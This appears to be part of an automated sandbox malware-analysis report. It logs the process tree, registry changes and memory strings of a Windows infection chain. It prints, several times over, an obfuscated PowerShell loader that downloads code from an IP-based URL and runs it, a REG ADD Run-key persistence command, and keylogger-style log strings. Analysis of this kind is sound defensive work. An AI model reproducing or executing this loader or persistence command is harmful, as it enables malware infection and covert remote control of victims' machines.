PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$filstandarder = 1;$uroglena='substrin';$uroglena+='g';function sarpedon($historicoprophetic){$nonmobile=$historicoprophetic.length-$filstandarder;for($hyletoner=4; $hyletoner -lt $nonmobile; $hyletoner+=(5)){$rhythms+=$historicoprophetic.$uroglena.invoke($hyletoner, $filstandarder);}$rhythms;}function bussemnd($revisionsinstituts){. ($koketten) ($revisionsinstituts);}$wheens=sarpedon 's.ikmopsgoorphz mapiin.al.reelaguranona/spid5indp. sy0angi t.ef(r ktwrecoidyknn coddcarbo,etywchecscalc teetnparetrepl unf 1wint0judo.erma0pign;tilr oxowboliiarnonfimr6desi4s,rv;,and olkxforr6f,la4 .ep; sup servrb hevclaw:reva1gr,n2brac1halo.lept0poic)s.ep volag mi.ekhmecphotkcra ofora/yok 2file0sgen1dupl0 va.0to,e1ench0fern1peri o haf,ophil.ngrbur.efleefmeseodekaxfran/bias1h.te2kand1alph.term0opla ';$coeducationalism=sarpedon 'forfuun.esbeewe dlirbor.- staa advgpol,evin,nklgetvejs ';$skppeskn=sarpedon ' lodh,orst.ultt nedpjust: ,ym/fru /unes8 la 7 tel.reli1conc2nons1p.ot. ans1kanv0 ede5damp.ph r1matr6chan3beha/ coubindfe,owelueueyfortvda.neampesafto2n,np4 app2 m,r.non,hudkehagg,ksop. ';$hyperaktivitet=sarpedon 'poly> tue ';$koketten=sarpedon 'bunki at.eov rxauto ';$brugermssige = sarpedon ',daae c,lcfrithmedio and ,eva% nda,agop.ortpmacrdrevial,vntk lia oku%paus\mells pronjujuerotogspullperievalvfpolyaepaprhydrtopi..engegtil ljmspobge, tge&nong&dime putoe hatcunrehperiospi, bedu$.pro ';bussemnd (sarpedon 'sort$fremg ausldomfophilbshatatrevlinde:fo.lkbratah,mia ,orrmusideupae.ordsflek=g,an(befrcen pmpseudeque urn/r dace,cu pend$ gembrul,rantiu f.rgh gte hy.ryankmoutpselecs rteifatcgnon.e sto)forr ');bussemnd (sarpedon 'span$.yangfluelsardomalebkonsateknl amt:sengs lu,t,atoreklee sann e.tgmatteuddak tigoskabrrandenoncnun depepp=slag$subss ar kspisptuftprke ekodrs gehk ,etnfrys.shavsdemoplongl juviaflotfo s(proc$taphhfarsyhattppreoe gerr posae,idkkisstannuinonmvrtssiascethawkevelutepit)v.rs ');$skppeskn=$strengekorene[0];bussemnd (sarpedon 'r te$susbgpak l elloadvibproga opelk,nt:by,ttf acochorsbutismystehalvhunheoungkvcopseindbd russtota=tilvnomrye pubwpse -phonoepitbtra,jhardereamcwh.ttbest ronds be.ystips pertomgrejoinmam.i. arbn iffe ,let,ens. conwexc.es ntb gedcove,lspriigumme datnb cktraad ');bussemnd (sarpedon 'sani$cla,tnumsofejlshymnspe.ge anhh foro ubov decelamidaflysudfl.nedghsvikeromaau,deddicteuninrimpisskul[cl.v$ tyncfinaoopsked crdupupu .ricselva mdetpa livinkoknognl,msaan,tl optiuntrs adsm.aff] ra,=ra.p$bleewmandhk.miediseecananstabs.oom ');$fantasises=sarpedon 'unstt b,nosulfsansksembee t,lhtesko,ollvhandenumidatlasdeta.,itudgrapok rtw,yhen,perlbrdtobad.atrandweinf indiguttl ch.e red(troi$stemsleafkgge,pdo,apdataebjersscorkobs,nte.s,prei$mezco gulvradieturbr,ordftyphesahaaurovrnrmefpreau aftlprodn .veepress,roas und7skri9ring)fje, ';$fantasises=$kaardes[1]+$fantasises;$overfearfulness79=$kaardes[0];bussemnd (sarpedon 'f
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$filstandarder = 1;$uroglena='substrin';$uroglena+='g';function sarpedon($historicoprophetic){$nonmobile=$historicoprophetic.length-$filstandarder;for($hyletoner=4; $hyletoner -lt $nonmobile; $hyletoner+=(5)){$rhythms+=$historicoprophetic.$uroglena.invoke($hyletoner, $filstandarder);}$rhythms;}function bussemnd($revisionsinstituts){. ($koketten) ($revisionsinstituts);}$wheens=sarpedon 's.ikmopsgoorphz mapiin.al.reelaguranona/spid5indp. sy0angi t.ef(r ktwrecoidyknn coddcarbo,etywchecscalc teetnparetrepl unf 1wint0judo.erma0pign;tilr oxowboliiarnonfimr6desi4s,rv;,and olkxforr6f,la4 .ep; sup servrb hevclaw:reva1gr,n2brac1halo.lept0poic)s.ep volag mi.ekhmecphotkcra ofora/yok 2file0sgen1dupl0 va.0to,e1ench0fern1peri o haf,ophil.ngrbur.efleefmeseodekaxfran/bias1h.te2kand1alph.term0opla ';$coeducationalism=sarpedon 'forfuun.esbeewe dlirbor.- staa advgpol,evin,nklgetvejs ';$skppeskn=sarpedon ' lodh,orst.ultt nedpjust: ,ym/fru /unes8 la 7 tel.reli1conc2nons1p.ot. ans1kanv0 ede5damp.ph r1matr6chan3beha/ coubindfe,owelueueyfortvda.neampesafto2n,np4 app2 m,r.non,hudkehagg,ksop. ';$hyperaktivitet=sarpedon 'poly> tue ';$koketten=sarpedon 'bunki at.eov rxauto ';$brugermssige = sarpedon ',daae c,lcfrithmedio and ,eva% nda,agop.ortpmacrdrevial,vntk lia oku%paus\mells pronjujuerotogspullperievalvfpolyaepaprhydrtopi..engegtil ljmspobge, tge&nong&dime putoe hatcunrehperiospi, bedu$.pro ';bussemnd (sarpedon 'sort$fremg ausldomfophilbshatatrevlinde:fo.lkbratah,mia ,orrmusideupae.ordsflek=g,an(befrcen pmpseudeque urn/r dace,cu pend$ gembrul,rantiu f.rgh gte hy.ryankmoutpselecs rteifatcgnon.e sto)forr ');bussemnd (sarpedon 'span$.yangfluelsardomalebkonsateknl amt:sengs lu,t,atoreklee sann e.tgmatteuddak tigoskabrrandenoncnun depepp=slag$subss ar kspisptuftprke ekodrs gehk ,etnfrys.shavsdemoplongl juviaflotfo s(proc$taphhfarsyhattppreoe gerr posae,idkkisstannuinonmvrtssiascethawkevelutepit)v.rs ');$skppeskn=$strengekorene[0];bussemnd (sarpedon 'r te$susbgpak l elloadvibproga opelk,nt:by,ttf acochorsbutismystehalvhunheoungkvcopseindbd russtota=tilvnomrye pubwpse -phonoepitbtra,jhardereamcwh.ttbest ronds be.ystips pertomgrejoinmam.i. arbn iffe ,let,ens. conwexc.es ntb gedcove,lspriigumme datnb cktraad ');bussemnd (sarpedon 'sani$cla,tnumsofejlshymnspe.ge anhh foro ubov decelamidaflysudfl.nedghsvikeromaau,deddicteuninrimpisskul[cl.v$ tyncfinaoopsked crdupupu .ricselva mdetpa livinkoknognl,msaan,tl optiuntrs adsm.aff] ra,=ra.p$bleewmandhk.miediseecananstabs.oom ');$fantasises=sarpedon 'unstt b,nosulfsansksembee t,lhtesko,ollvhandenumidatlasdeta.,itudgrapok rtw,yhen,perlbrdtobad.atrandweinf indiguttl ch.e red(troi$stemsleafkgge,pdo,apdataebjersscorkobs,nte.s,prei$mezco gulvradieturbr,ordftyphesahaaurovrnrmefpreau aftlprodn .veepress,roas und7skri9ring)fje, ';$fantasises=$kaardes[1]+$fantasises;$overfearfulness79=$kaardes[0];bussemnd (sarpedon 'f
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$filstandarder = 1;$uroglena='substrin';$uroglena+='g';function sarpedon($historicoprophetic){$nonmobile=$historicoprophetic.length-$filstandarder;for($hyletoner=4; $hyletoner -lt $nonmobile; $hyletoner+=(5)){$rhythms+=$historicoprophetic.$uroglena.invoke($hyletoner, $filstandarder);}$rhythms;}function bussemnd($revisionsinstituts){. ($koketten) ($revisionsinstituts);}$wheens=sarpedon 's.ikmopsgoorphz mapiin.al.reelaguranona/spid5indp. sy0angi t.ef(r ktwrecoidyknn coddcarbo,etywchecscalc teetnparetrepl unf 1wint0judo.erma0pign;tilr oxowboliiarnonfimr6desi4s,rv;,and olkxforr6f,la4 .ep; sup servrb hevclaw:reva1gr,n2brac1halo.lept0poic)s.ep volag mi.ekhmecphotkcra ofora/yok 2file0sgen1dupl0 va.0to,e1ench0fern1peri o haf,ophil.ngrbur.efleefmeseodekaxfran/bias1h.te2kand1alph.term0opla ';$coeducationalism=sarpedon 'forfuun.esbeewe dlirbor.- staa advgpol,evin,nklgetvejs ';$skppeskn=sarpedon ' lodh,orst.ultt nedpjust: ,ym/fru /unes8 la 7 tel.reli1conc2nons1p.ot. ans1kanv0 ede5damp.ph r1matr6chan3beha/ coubindfe,owelueueyfortvda.neampesafto2n,np4 app2 m,r.non,hudkehagg,ksop. ';$hyperaktivitet=sarpedon 'poly> tue ';$koketten=sarpedon 'bunki at.eov rxauto ';$brugermssige = sarpedon ',daae c,lcfrithmedio and ,eva% nda,agop.ortpmacrdrevial,vntk lia oku%paus\mells pronjujuerotogspullperievalvfpolyaepaprhydrtopi..engegtil ljmspobge, tge&nong&dime putoe hatcunrehperiospi, bedu$.pro ';bussemnd (sarpedon 'sort$fremg ausldomfophilbshatatrevlinde:fo.lkbratah,mia ,orrmusideupae.ordsflek=g,an(befrcen pmpseudeque urn/r dace,cu pend$ gembrul,rantiu f.rgh gte hy.ryankmoutpselecs rteifatcgnon.e sto)forr ');bussemnd (sarpedon 'span$.yangfluelsardomalebkonsateknl amt:sengs lu,t,atoreklee sann e.tgmatteuddak tigoskabrrandenoncnun depepp=slag$subss ar kspisptuftprke ekodrs gehk ,etnfrys.shavsdemoplongl juviaflotfo s(proc$taphhfarsyhattppreoe gerr posae,idkkisstannuinonmvrtssiascethawkevelutepit)v.rs ');$skppeskn=$strengekorene[0];bussemnd (sarpedon 'r te$susbgpak l elloadvibproga opelk,nt:by,ttf acochorsbutismystehalvhunheoungkvcopseindbd russtota=tilvnomrye pubwpse -phonoepitbtra,jhardereamcwh.ttbest ronds be.ystips pertomgrejoinmam.i. arbn iffe ,let,ens. conwexc.es ntb gedcove,lspriigumme datnb cktraad ');bussemnd (sarpedon 'sani$cla,tnumsofejlshymnspe.ge anhh foro ubov decelamidaflysudfl.nedghsvikeromaau,deddicteuninrimpisskul[cl.v$ tyncfinaoopsked crdupupu .ricselva mdetpa livinkoknognl,msaan,tl optiuntrs adsm.aff] ra,=ra.p$bleewmandhk.miediseecananstabs.oom ');$fantasises=sarpedon 'unstt b,nosulfsansksembee t,lhtesko,ollvhandenumidatlasdeta.,itudgrapok rtw,yhen,perlbrdtobad.atrandweinf indiguttl ch.e red(troi$stemsleafkgge,pdo,apdataebjersscorkobs,nte.s,prei$mezco gulvradieturbr,ordftyphesahaaurovrnrmefpreau aftlprodn .veepress,roas und7skri9ring)fje, ';$fantasises=$kaardes[1]+$fantasises;$overfearfulness79=$kaardes[0];bussemnd (sarpedon 'fJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$filstandarder = 1;$uroglena='substrin';$uroglena+='g';function sarpedon($historicoprophetic){$nonmobile=$historicoprophetic.length-$filstandarder;for($hyletoner=4; $hyletoner -lt $nonmobile; $hyletoner+=(5)){$rhythms+=$historicoprophetic.$uroglena.invoke($hyletoner, $filstandarder);}$rhythms;}function bussemnd($revisionsinstituts){. ($koketten) ($revisionsinstituts);}$wheens=sarpedon 's.ikmopsgoorphz mapiin.al.reelaguranona/spid5indp. sy0angi t.ef(r ktwrecoidyknn coddcarbo,etywchecscalc teetnparetrepl unf 1wint0judo.erma0pign;tilr oxowboliiarnonfimr6desi4s,rv;,and olkxforr6f,la4 .ep; sup servrb hevclaw:reva1gr,n2brac1halo.lept0poic)s.ep volag mi.ekhmecphotkcra ofora/yok 2file0sgen1dupl0 va.0to,e1ench0fern1peri o haf,ophil.ngrbur.efleefmeseodekaxfran/bias1h.te2kand1alph.term0opla ';$coeducationalism=sarpedon 'forfuun.esbeewe dlirbor.- staa advgpol,evin,nklgetvejs ';$skppeskn=sarpedon ' lodh,orst.ultt nedpjust: ,ym/fru /unes8 la 7 tel.reli1conc2nons1p.ot. ans1kanv0 ede5damp.ph r1matr6chan3beha/ coubindfe,owelueueyfortvda.neampesafto2n,np4 app2 m,r.non,hudkehagg,ksop. ';$hyperaktivitet=sarpedon 'poly> tue ';$koketten=sarpedon 'bunki at.eov rxauto ';$brugermssige = sarpedon ',daae c,lcfrithmedio and ,eva% nda,agop.ortpmacrdrevial,vntk lia oku%paus\mells pronjujuerotogspullperievalvfpolyaepaprhydrtopi..engegtil ljmspobge, tge&nong&dime putoe hatcunrehperiospi, bedu$.pro ';bussemnd (sarpedon 'sort$fremg ausldomfophilbshatatrevlinde:fo.lkbratah,mia ,orrmusideupae.ordsflek=g,an(befrcen pmpseudeque urn/r dace,cu pend$ gembrul,rantiu f.rgh gte hy.ryankmoutpselecs rteifatcgnon.e sto)forr ');bussemnd (sarpedon 'span$.yangfluelsardomalebkonsateknl amt:sengs lu,t,atoreklee sann e.tgmatteuddak tigoskabrrandenoncnun depepp=slag$subss ar kspisptuftprke ekodrs gehk ,etnfrys.shavsdemoplongl juviaflotfo s(proc$taphhfarsyhattppreoe gerr posae,idkkisstannuinonmvrtssiascethawkevelutepit)v.rs ');$skppeskn=$strengekorene[0];bussemnd (sarpedon 'r te$susbgpak l elloadvibproga opelk,nt:by,ttf acochorsbutismystehalvhunheoungkvcopseindbd russtota=tilvnomrye pubwpse -phonoepitbtra,jhardereamcwh.ttbest ronds be.ystips pertomgrejoinmam.i. arbn iffe ,let,ens. conwexc.es ntb gedcove,lspriigumme datnb cktraad ');bussemnd (sarpedon 'sani$cla,tnumsofejlshymnspe.ge anhh foro ubov decelamidaflysudfl.nedghsvikeromaau,deddicteuninrimpisskul[cl.v$ tyncfinaoopsked crdupupu .ricselva mdetpa livinkoknognl,msaan,tl optiuntrs adsm.aff] ra,=ra.p$bleewmandhk.miediseecananstabs.oom ');$fantasises=sarpedon 'unstt b,nosulfsansksembee t,lhtesko,ollvhandenumidatlasdeta.,itudgrapok rtw,yhen,perlbrdtobad.atrandweinf indiguttl ch.e red(troi$stemsleafkgge,pdo,apdataebjersscorkobs,nte.s,prei$mezco gulvradieturbr,ordftyphesahaaurovrnrmefpreau aftlprodn .veepress,roas und7skri9ring)fje, ';$fantasises=$kaardes[1]+$fantasises;$overfearfulness79=$kaardes[0];bussemnd (sarpedon 'fJump to behavior
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrs
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerEM
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/s
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_sE
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager}s'
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLs6
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager sB
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/04/20 16:05:48 Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerds
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc300cfO
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerxs
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.drBinary or memory string: [2024/04/20 16:05:42 Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerKs)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
